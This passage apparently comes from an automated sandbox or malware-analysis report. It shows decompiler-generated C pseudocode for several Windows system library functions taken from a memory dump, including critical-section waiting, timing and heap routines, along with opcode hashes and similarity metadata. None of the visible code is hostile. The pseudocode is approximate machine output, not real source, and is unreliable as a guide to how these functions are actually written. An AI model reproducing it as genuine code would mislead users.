                                                                                                                                    				intOrPtr _v60;
                                                                                                                                    				intOrPtr _v64;
                                                                                                                                    				intOrPtr _v68;
                                                                                                                                    				intOrPtr _v72;
                                                                                                                                    				intOrPtr _v76;
                                                                                                                                    				char _v77;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                    				intOrPtr _t67;
                                                                                                                                    				intOrPtr _t68;
                                                                                                                                    				char* _t73;
                                                                                                                                    				intOrPtr _t77;
                                                                                                                                    				intOrPtr _t78;
                                                                                                                                    				signed int _t82;
                                                                                                                                    				intOrPtr _t83;
                                                                                                                                    				void* _t87;
                                                                                                                                    				char _t88;
                                                                                                                                    				intOrPtr* _t89;
                                                                                                                                    				intOrPtr _t91;
                                                                                                                                    				void* _t97;
                                                                                                                                    				intOrPtr _t100;
                                                                                                                                    				void* _t102;
                                                                                                                                    				void* _t107;
                                                                                                                                    				signed int _t108;
                                                                                                                                    				intOrPtr* _t112;
                                                                                                                                    				void* _t113;
                                                                                                                                    				intOrPtr* _t114;
                                                                                                                                    				intOrPtr _t115;
                                                                                                                                    				intOrPtr _t116;
                                                                                                                                    				intOrPtr _t117;
                                                                                                                                    				signed int _t118;
                                                                                                                                    				void* _t130;
                                                                                                                                    
                                                                                                                                    				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                                                                                    				_v8 =  *0x4c2d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                                                                                    				_t112 = __ecx;
                                                                                                                                    				_v77 = __edx;
                                                                                                                                    				_v48 = __ecx;
                                                                                                                                    				_v28 = 0;
                                                                                                                                    				_t5 = _t112 + 0xc; // 0x575651ff
                                                                                                                                    				_t105 =  *_t5;
                                                                                                                                    				_v20 = 0;
                                                                                                                                    				_v16 = 0;
                                                                                                                                    				if(_t105 == 0) {
                                                                                                                                    					_t50 = _t112 + 4; // 0x5de58b5b
                                                                                                                                    					_t60 =  *__ecx |  *_t50;
                                                                                                                                    					if(( *__ecx |  *_t50) != 0) {
                                                                                                                                    						 *__ecx = 0;
                                                                                                                                    						__ecx[1] = 0;
                                                                                                                                    						if(E04B57D50() != 0) {
                                                                                                                                    							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                                    						} else {
                                                                                                                                    							_t65 = 0x7ffe0386;
                                                                                                                                    						}
                                                                                                                                    						if( *_t65 != 0) {
                                                                                                                                    							E04C08CD6(_t112);
                                                                                                                                    						}
                                                                                                                                    						_push(0);
                                                                                                                                    						_t52 = _t112 + 0x10; // 0x778df98b
                                                                                                                                    						_push( *_t52);
                                                                                                                                    						_t60 = E04B79E20();
                                                                                                                                    					}
                                                                                                                                    					L20:
                                                                                                                                    					_pop(_t107);
                                                                                                                                    					_pop(_t113);
                                                                                                                                    					_pop(_t87);
                                                                                                                                    					return E04B7B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                                                                                    				}
                                                                                                                                    				_t8 = _t112 + 8; // 0x8b000cc2
                                                                                                                                    				_t67 =  *_t8;
                                                                                                                                    				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                                                                                    				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                                                                                    				_t108 =  *(_t67 + 0x14);
                                                                                                                                    				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                                                                                    				_t105 = 0x2710;
                                                                                                                                    				asm("sbb eax, edi");
                                                                                                                                    				_v44 = _t88;
                                                                                                                                    				_v52 = _t108;
                                                                                                                                    				_t60 = E04B7CE00(_t97, _t68, 0x2710, 0);
                                                                                                                                    				_v56 = _t60;
                                                                                                                                    				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                                                                                    					L3:
                                                                                                                                    					 *(_t112 + 0x44) = _t60;
                                                                                                                                    					_t105 = _t60 * 0x2710 >> 0x20;
                                                                                                                                    					 *_t112 = _t88;
                                                                                                                                    					 *(_t112 + 4) = _t108;
                                                                                                                                    					_v20 = _t60 * 0x2710;
                                                                                                                                    					_v16 = _t60 * 0x2710 >> 0x20;
                                                                                                                                    					if(_v77 != 0) {
                                                                                                                                    						L16:
                                                                                                                                    						_v36 = _t88;
                                                                                                                                    						_v32 = _t108;
                                                                                                                                    						if(E04B57D50() != 0) {
                                                                                                                                    							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                                    						} else {
                                                                                                                                    							_t73 = 0x7ffe0386;
                                                                                                                                    						}
                                                                                                                                    						if( *_t73 != 0) {
                                                                                                                                    							_t105 = _v40;
                                                                                                                                    							E04C08F6A(_t112, _v40, _t88, _t108);
                                                                                                                                    						}
                                                                                                                                    						_push( &_v28);
                                                                                                                                    						_push(0);
                                                                                                                                    						_push( &_v36);
                                                                                                                                    						_t48 = _t112 + 0x10; // 0x778df98b
                                                                                                                                    						_push( *_t48);
                                                                                                                                    						_t60 = E04B7AF60();
                                                                                                                                    						goto L20;
                                                                                                                                    					} else {
                                                                                                                                    						_t89 = 0x7ffe03b0;
                                                                                                                                    						do {
                                                                                                                                    							_t114 = 0x7ffe0010;
                                                                                                                                    							do {
                                                                                                                                    								_t77 =  *0x4c28628; // 0x0
                                                                                                                                    								_v68 = _t77;
                                                                                                                                    								_t78 =  *0x4c2862c; // 0x0
                                                                                                                                    								_v64 = _t78;
                                                                                                                                    								_v72 =  *_t89;
                                                                                                                                    								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                                                                                    								while(1) {
                                                                                                                                    									_t105 =  *0x7ffe000c;
                                                                                                                                    									_t100 =  *0x7ffe0008;
                                                                                                                                    									if(_t105 ==  *_t114) {
                                                                                                                                    										goto L8;
                                                                                                                                    									}
                                                                                                                                    									asm("pause");
                                                                                                                                    								}
                                                                                                                                    								L8:
                                                                                                                                    								_t89 = 0x7ffe03b0;
                                                                                                                                    								_t115 =  *0x7ffe03b0;
                                                                                                                                    								_t82 =  *0x7FFE03B4;
                                                                                                                                    								_v60 = _t115;
                                                                                                                                    								_t114 = 0x7ffe0010;
                                                                                                                                    								_v56 = _t82;
                                                                                                                                    							} while (_v72 != _t115 || _v76 != _t82);
                                                                                                                                    							_t83 =  *0x4c28628; // 0x0
                                                                                                                                    							_t116 =  *0x4c2862c; // 0x0
                                                                                                                                    							_v76 = _t116;
                                                                                                                                    							_t117 = _v68;
                                                                                                                                    						} while (_t117 != _t83 || _v64 != _v76);
                                                                                                                                    						asm("sbb edx, [esp+0x24]");
                                                                                                                                    						_t102 = _t100 - _v60 - _t117;
                                                                                                                                    						_t112 = _v48;
                                                                                                                                    						_t91 = _v44;
                                                                                                                                    						asm("sbb edx, eax");
                                                                                                                                    						_t130 = _t105 - _v52;
                                                                                                                                    						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                                                                                    							_t88 = _t102 - _t91;
                                                                                                                                    							asm("sbb edx, edi");
                                                                                                                                    							_t108 = _t105;
                                                                                                                                    						} else {
                                                                                                                                    							_t88 = 0;
                                                                                                                                    							_t108 = 0;
                                                                                                                                    						}
                                                                                                                                    						goto L16;
                                                                                                                                    					}
                                                                                                                                    				} else {
                                                                                                                                    					if( *(_t112 + 0x44) == _t60) {
                                                                                                                                    						goto L20;
                                                                                                                                    					}
                                                                                                                                    					goto L3;
                                                                                                                                    				}
                                                                                                                                    			}

                                                                                                                                    APIs
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B5B9A5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 885266447-0
                                                                                                                                    • Opcode ID: 294f3bff7fdbd107587a91ccdf292af6d750e904b3d2312d82abfba43af165d2
                                                                                                                                    • Instruction ID: a9eb9f21ceb589297608fbcd05d263023b15425974cef5dec58ebb4075c5141f
                                                                                                                                    • Opcode Fuzzy Hash: 294f3bff7fdbd107587a91ccdf292af6d750e904b3d2312d82abfba43af165d2
                                                                                                                                    • Instruction Fuzzy Hash: 9F515A71608340CFD720DF28C480A2AFBE5FB88614F1489AEF99587364EB71F945CB92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 63%
                                                                                                                                    			E04B32D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                                                                                                    				signed char _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				intOrPtr _v28;
                                                                                                                                    				intOrPtr _v32;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				void* __esi;
                                                                                                                                    				void* __ebp;
                                                                                                                                    				intOrPtr _t55;
                                                                                                                                    				signed int _t57;
                                                                                                                                    				signed int _t58;
                                                                                                                                    				char* _t62;
                                                                                                                                    				signed char* _t63;
                                                                                                                                    				signed char* _t64;
                                                                                                                                    				signed int _t67;
                                                                                                                                    				signed int _t72;
                                                                                                                                    				signed int _t77;
                                                                                                                                    				signed int _t78;
                                                                                                                                    				signed int _t88;
                                                                                                                                    				intOrPtr _t89;
                                                                                                                                    				signed char _t93;
                                                                                                                                    				signed int _t97;
                                                                                                                                    				signed int _t98;
                                                                                                                                    				signed int _t102;
                                                                                                                                    				signed int _t103;
                                                                                                                                    				intOrPtr _t104;
                                                                                                                                    				signed int _t105;
                                                                                                                                    				signed int _t106;
                                                                                                                                    				signed char _t109;
                                                                                                                                    				signed int _t111;
                                                                                                                                    				void* _t116;
                                                                                                                                    
                                                                                                                                    				_t102 = __edi;
                                                                                                                                    				_t97 = __edx;
                                                                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                                                                    				_t55 =  *[fs:0x18];
                                                                                                                                    				_t109 = __ecx;
                                                                                                                                    				_v8 = __edx;
                                                                                                                                    				_t86 = 0;
                                                                                                                                    				_v32 = _t55;
                                                                                                                                    				_v24 = 0;
                                                                                                                                    				_push(__edi);
                                                                                                                                    				if(__ecx == 0x4c25350) {
                                                                                                                                    					_t86 = 1;
                                                                                                                                    					_v24 = 1;
                                                                                                                                    					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                                                                                                    				}
                                                                                                                                    				_t103 = _t102 | 0xffffffff;
                                                                                                                                    				if( *0x4c27bc8 != 0) {
                                                                                                                                    					_push(0xc000004b);
                                                                                                                                    					_push(_t103);
                                                                                                                                    					E04B797C0();
                                                                                                                                    				}
                                                                                                                                    				if( *0x4c279c4 != 0) {
                                                                                                                                    					_t57 = 0;
                                                                                                                                    				} else {
                                                                                                                                    					_t57 = 0x4c279c8;
                                                                                                                                    				}
                                                                                                                                    				_v16 = _t57;
                                                                                                                                    				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                                                                                                    					_t93 = _t109;
                                                                                                                                    					L23();
                                                                                                                                    				}
                                                                                                                                    				_t58 =  *_t109;
                                                                                                                                    				if(_t58 == _t103) {
                                                                                                                                    					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                                                                                                    					_t58 = _t103;
                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                    						_t93 = _t109;
                                                                                                                                    						E04B61624(_t86, __eflags);
                                                                                                                                    						_t58 =  *_t109;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				_v20 = _v20 & 0x00000000;
                                                                                                                                    				if(_t58 != _t103) {
                                                                                                                                    					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                                                                                                    				}
                                                                                                                                    				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                                                                                                    				_t88 = _v16;
                                                                                                                                    				_v28 = _t104;
                                                                                                                                    				L9:
                                                                                                                                    				while(1) {
                                                                                                                                    					if(E04B57D50() != 0) {
                                                                                                                                    						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                                                                                                    					} else {
                                                                                                                                    						_t62 = 0x7ffe0382;
                                                                                                                                    					}
                                                                                                                                    					if( *_t62 != 0) {
                                                                                                                                    						_t63 =  *[fs:0x30];
                                                                                                                                    						__eflags = _t63[0x240] & 0x00000002;
                                                                                                                                    						if((_t63[0x240] & 0x00000002) != 0) {
                                                                                                                                    							_t93 = _t109;
                                                                                                                                    							E04BCFE87(_t93);
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					if(_t104 != 0xffffffff) {
                                                                                                                                    						_push(_t88);
                                                                                                                                    						_push(0);
                                                                                                                                    						_push(_t104);
                                                                                                                                    						_t64 = E04B79520();
                                                                                                                                    						goto L15;
                                                                                                                                    					} else {
                                                                                                                                    						while(1) {
                                                                                                                                    							_t97 =  &_v8;
                                                                                                                                    							_t64 = E04B6E18B(_t109 + 4, _t97, 4, _t88, 0);
                                                                                                                                    							if(_t64 == 0x102) {
                                                                                                                                    								break;
                                                                                                                                    							}
                                                                                                                                    							_t93 =  *(_t109 + 4);
                                                                                                                                    							_v8 = _t93;
                                                                                                                                    							if((_t93 & 0x00000002) != 0) {
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    							L15:
                                                                                                                                    							if(_t64 == 0x102) {
                                                                                                                                    								break;
                                                                                                                                    							}
                                                                                                                                    							_t89 = _v24;
                                                                                                                                    							if(_t64 < 0) {
                                                                                                                                    								L04B8DF30(_t93, _t97, _t64);
                                                                                                                                    								_push(_t93);
                                                                                                                                    								_t98 = _t97 | 0xffffffff;
                                                                                                                                    								__eflags =  *0x4c26901;
                                                                                                                                    								_push(_t109);
                                                                                                                                    								_v52 = _t98;
                                                                                                                                    								if( *0x4c26901 != 0) {
                                                                                                                                    									_push(0);
                                                                                                                                    									_push(1);
                                                                                                                                    									_push(0);
                                                                                                                                    									_push(0x100003);
                                                                                                                                    									_push( &_v12);
                                                                                                                                    									_t72 = E04B79980();
                                                                                                                                    									__eflags = _t72;
                                                                                                                                    									if(_t72 < 0) {
                                                                                                                                    										_v12 = _t98 | 0xffffffff;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								asm("lock cmpxchg [ecx], edx");
                                                                                                                                    								_t111 = 0;
                                                                                                                                    								__eflags = 0;
                                                                                                                                    								if(0 != 0) {
                                                                                                                                    									__eflags = _v12 - 0xffffffff;
                                                                                                                                    									if(_v12 != 0xffffffff) {
                                                                                                                                    										_push(_v12);
                                                                                                                                    										E04B795D0();
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									_t111 = _v12;
                                                                                                                                    								}
                                                                                                                                    								return _t111;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t89 != 0) {
                                                                                                                                    									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                                                                                                    									_t77 = E04B57D50();
                                                                                                                                    									__eflags = _t77;
                                                                                                                                    									if(_t77 == 0) {
                                                                                                                                    										_t64 = 0x7ffe0384;
                                                                                                                                    									} else {
                                                                                                                                    										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                                                                    									}
                                                                                                                                    									__eflags =  *_t64;
                                                                                                                                    									if( *_t64 != 0) {
                                                                                                                                    										_t64 =  *[fs:0x30];
                                                                                                                                    										__eflags = _t64[0x240] & 0x00000004;
                                                                                                                                    										if((_t64[0x240] & 0x00000004) != 0) {
                                                                                                                                    											_t78 = E04B57D50();
                                                                                                                                    											__eflags = _t78;
                                                                                                                                    											if(_t78 == 0) {
                                                                                                                                    												_t64 = 0x7ffe0385;
                                                                                                                                    											} else {
                                                                                                                                    												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                                                                    											}
                                                                                                                                    											__eflags =  *_t64 & 0x00000020;
                                                                                                                                    											if(( *_t64 & 0x00000020) != 0) {
                                                                                                                                    												_t64 = E04BB7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								return _t64;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						_t97 = _t88;
                                                                                                                                    						_t93 = _t109;
                                                                                                                                    						E04BCFDDA(_t97, _v12);
                                                                                                                                    						_t105 =  *_t109;
                                                                                                                                    						_t67 = _v12 + 1;
                                                                                                                                    						_v12 = _t67;
                                                                                                                                    						__eflags = _t105 - 0xffffffff;
                                                                                                                                    						if(_t105 == 0xffffffff) {
                                                                                                                                    							_t106 = 0;
                                                                                                                                    							__eflags = 0;
                                                                                                                                    						} else {
                                                                                                                                    							_t106 =  *(_t105 + 0x14);
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t67 - 2;
                                                                                                                                    						if(_t67 > 2) {
                                                                                                                                    							__eflags = _t109 - 0x4c25350;
                                                                                                                                    							if(_t109 != 0x4c25350) {
                                                                                                                                    								__eflags = _t106 - _v20;
                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                    									_t93 = _t109;
                                                                                                                                    									E04BCFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						_push("RTL: Re-Waiting\n");
                                                                                                                                    						_push(0);
                                                                                                                                    						_push(0x65);
                                                                                                                                    						_v20 = _t106;
                                                                                                                                    						E04BC5720();
                                                                                                                                    						_t104 = _v28;
                                                                                                                                    						_t116 = _t116 + 0xc;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RTL: Re-Waiting
                                                                                                                                    • API String ID: 0-316354757
                                                                                                                                    • Opcode ID: fac55533f0a3b54717b37915024a2e55774ea52153655f49df67c21a1ba7b431
                                                                                                                                    • Instruction ID: 55d91823280cb33d6b28238e98d54e32567cd2234ba3e2436713b4becaa844fa
                                                                                                                                    • Opcode Fuzzy Hash: fac55533f0a3b54717b37915024a2e55774ea52153655f49df67c21a1ba7b431
                                                                                                                                    • Instruction Fuzzy Hash: BA614170B00614AFEB35EF69C880B7EB7B5EB44728F1406EAE811972C0DB74B902D791
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                    			E04C00EA5(void* __ecx, void* __edx) {
                                                                                                                                    				signed int _v20;
                                                                                                                                    				char _v24;
                                                                                                                                    				intOrPtr _v28;
                                                                                                                                    				unsigned int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				intOrPtr _v40;
                                                                                                                                    				char _v44;
                                                                                                                                    				intOrPtr _v64;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				signed int _t58;
                                                                                                                                    				unsigned int _t60;
                                                                                                                                    				intOrPtr _t62;
                                                                                                                                    				char* _t67;
                                                                                                                                    				char* _t69;
                                                                                                                                    				void* _t80;
                                                                                                                                    				void* _t83;
                                                                                                                                    				intOrPtr _t93;
                                                                                                                                    				intOrPtr _t115;
                                                                                                                                    				char _t117;
                                                                                                                                    				void* _t120;
                                                                                                                                    
                                                                                                                                    				_t83 = __edx;
                                                                                                                                    				_t117 = 0;
                                                                                                                                    				_t120 = __ecx;
                                                                                                                                    				_v44 = 0;
                                                                                                                                    				if(E04BFFF69(__ecx,  &_v44,  &_v32) < 0) {
                                                                                                                                    					L24:
                                                                                                                                    					_t109 = _v44;
                                                                                                                                    					if(_v44 != 0) {
                                                                                                                                    						E04C01074(_t83, _t120, _t109, _t117, _t117);
                                                                                                                                    					}
                                                                                                                                    					L26:
                                                                                                                                    					return _t117;
                                                                                                                                    				}
                                                                                                                                    				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                                                                    				_t5 = _t83 + 1; // 0x1
                                                                                                                                    				_v36 = _t5 << 0xc;
                                                                                                                                    				_v40 = _t93;
                                                                                                                                    				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                                                                                                    				asm("sbb ebx, ebx");
                                                                                                                                    				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                                                                                                    				if(_t58 != 0) {
                                                                                                                                    					_push(0);
                                                                                                                                    					_push(0x14);
                                                                                                                                    					_push( &_v24);
                                                                                                                                    					_push(3);
                                                                                                                                    					_push(_t93);
                                                                                                                                    					_push(0xffffffff);
                                                                                                                                    					_t80 = E04B79730();
                                                                                                                                    					_t115 = _v64;
                                                                                                                                    					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                                                                                                    						_push(_t93);
                                                                                                                                    						E04BFA80D(_t115, 1, _v20, _t117);
                                                                                                                                    						_t83 = 4;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				if(E04BFA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                                                                                                    					goto L24;
                                                                                                                                    				}
                                                                                                                                    				_t60 = _v32;
                                                                                                                                    				_t97 = (_t60 != 0x100000) + 1;
                                                                                                                                    				_t83 = (_v44 -  *0x4c28b04 >> 0x14) + (_v44 -  *0x4c28b04 >> 0x14);
                                                                                                                                    				_v28 = (_t60 != 0x100000) + 1;
                                                                                                                                    				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                                                                                                    				_v40 = _t62;
                                                                                                                                    				if(_t83 >= _t62) {
                                                                                                                                    					L10:
                                                                                                                                    					asm("lock xadd [eax], ecx");
                                                                                                                                    					asm("lock xadd [eax], ecx");
                                                                                                                                    					if(E04B57D50() == 0) {
                                                                                                                                    						_t67 = 0x7ffe0380;
                                                                                                                                    					} else {
                                                                                                                                    						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                                    					}
                                                                                                                                    					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                                                    						E04BF138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                                                                                                    					}
                                                                                                                                    					if(E04B57D50() == 0) {
                                                                                                                                    						_t69 = 0x7ffe0388;
                                                                                                                                    					} else {
                                                                                                                                    						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                                    					}
                                                                                                                                    					if( *_t69 != 0) {
                                                                                                                                    						E04BEFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                                                                                                    					}
                                                                                                                                    					if(( *0x4c28724 & 0x00000008) != 0) {
                                                                                                                                    						E04BF52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                                                                                                    					}
                                                                                                                                    					_t117 = _v44;
                                                                                                                                    					goto L26;
                                                                                                                                    				}
                                                                                                                                    				while(E04C015B5(0x4c28ae4, _t83, _t97, _t97) >= 0) {
                                                                                                                                    					_t97 = _v28;
                                                                                                                                    					_t83 = _t83 + 2;
                                                                                                                                    					if(_t83 < _v40) {
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					goto L10;
                                                                                                                                    				}
                                                                                                                                    				goto L24;
                                                                                                                                    			}

























                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: `
                                                                                                                                    • API String ID: 0-2679148245
                                                                                                                                    • Opcode ID: 40ad819fe918417e500c2b60a25ad8e810bc4cd5588e8ebbd5181ac3bec3ddc0
                                                                                                                                    • Instruction ID: c0a941c943705f97e45a3447ef892be8781cb27ddbe3217b21c03e3521d4483d
                                                                                                                                    • Opcode Fuzzy Hash: 40ad819fe918417e500c2b60a25ad8e810bc4cd5588e8ebbd5181ac3bec3ddc0
                                                                                                                                    • Instruction Fuzzy Hash: 4251BF702043419FE324DF19D884B2BB7E6EBC4308F08896CF98697290DB71F905C761
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                    			E04B6F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				char* _v20;
                                                                                                                                    				intOrPtr _v24;
                                                                                                                                    				char _v28;
                                                                                                                                    				intOrPtr _v32;
                                                                                                                                    				char _v36;
                                                                                                                                    				char _v44;
                                                                                                                                    				char _v52;
                                                                                                                                    				intOrPtr _v56;
                                                                                                                                    				char _v60;
                                                                                                                                    				intOrPtr _v72;
                                                                                                                                    				void* _t51;
                                                                                                                                    				void* _t58;
                                                                                                                                    				signed short _t82;
                                                                                                                                    				short _t84;
                                                                                                                                    				signed int _t91;
                                                                                                                                    				signed int _t100;
                                                                                                                                    				signed short* _t103;
                                                                                                                                    				void* _t108;
                                                                                                                                    				intOrPtr* _t109;
                                                                                                                                    
                                                                                                                                    				_t103 = __ecx;
                                                                                                                                    				_t82 = __edx;
                                                                                                                                    				_t51 = E04B54120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                                                                                                    				if(_t51 >= 0) {
                                                                                                                                    					_push(0x21);
                                                                                                                                    					_push(3);
                                                                                                                                    					_v56 =  *0x7ffe02dc;
                                                                                                                                    					_v20 =  &_v52;
                                                                                                                                    					_push( &_v44);
                                                                                                                                    					_v28 = 0x18;
                                                                                                                                    					_push( &_v28);
                                                                                                                                    					_push(0x100020);
                                                                                                                                    					_v24 = 0;
                                                                                                                                    					_push( &_v60);
                                                                                                                                    					_v16 = 0x40;
                                                                                                                                    					_v12 = 0;
                                                                                                                                    					_v8 = 0;
                                                                                                                                    					_t58 = E04B79830();
                                                                                                                                    					_t87 =  *[fs:0x30];
                                                                                                                                    					_t108 = _t58;
                                                                                                                                    					L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                                                                                                    					if(_t108 < 0) {
                                                                                                                                    						L11:
                                                                                                                                    						_t51 = _t108;
                                                                                                                                    					} else {
                                                                                                                                    						_push(4);
                                                                                                                                    						_push(8);
                                                                                                                                    						_push( &_v36);
                                                                                                                                    						_push( &_v44);
                                                                                                                                    						_push(_v60);
                                                                                                                                    						_t108 = E04B79990();
                                                                                                                                    						if(_t108 < 0) {
                                                                                                                                    							L10:
                                                                                                                                    							_push(_v60);
                                                                                                                                    							E04B795D0();
                                                                                                                                    							goto L11;
                                                                                                                                    						} else {
                                                                                                                                    							_t109 = L04B54620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                                                                                                    							if(_t109 == 0) {
                                                                                                                                    								_t108 = 0xc0000017;
                                                                                                                                    								goto L10;
                                                                                                                                    							} else {
                                                                                                                                    								_t21 = _t109 + 0x18; // 0x18
                                                                                                                                    								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                                                                                                    								 *_t109 = 1;
                                                                                                                                    								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                                                                                                    								 *(_t109 + 0xe) = _t82;
                                                                                                                                    								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                                                                                                    								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                                                                                                    								E04B7F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                                                                                                    								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                                    								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                                                                                                    								_t91 =  *_t103 & 0x0000ffff;
                                                                                                                                    								_t100 = _t91 & 0xfffffffe;
                                                                                                                                    								_t84 = 0x5c;
                                                                                                                                    								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                                                                                                    									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                                                                                                    										_push(_v60);
                                                                                                                                    										E04B795D0();
                                                                                                                                    										L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                                                                                                    										_t51 = 0xc0000106;
                                                                                                                                    									} else {
                                                                                                                                    										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                                                                                                    										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                                    										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                                                                                                    										goto L5;
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									L5:
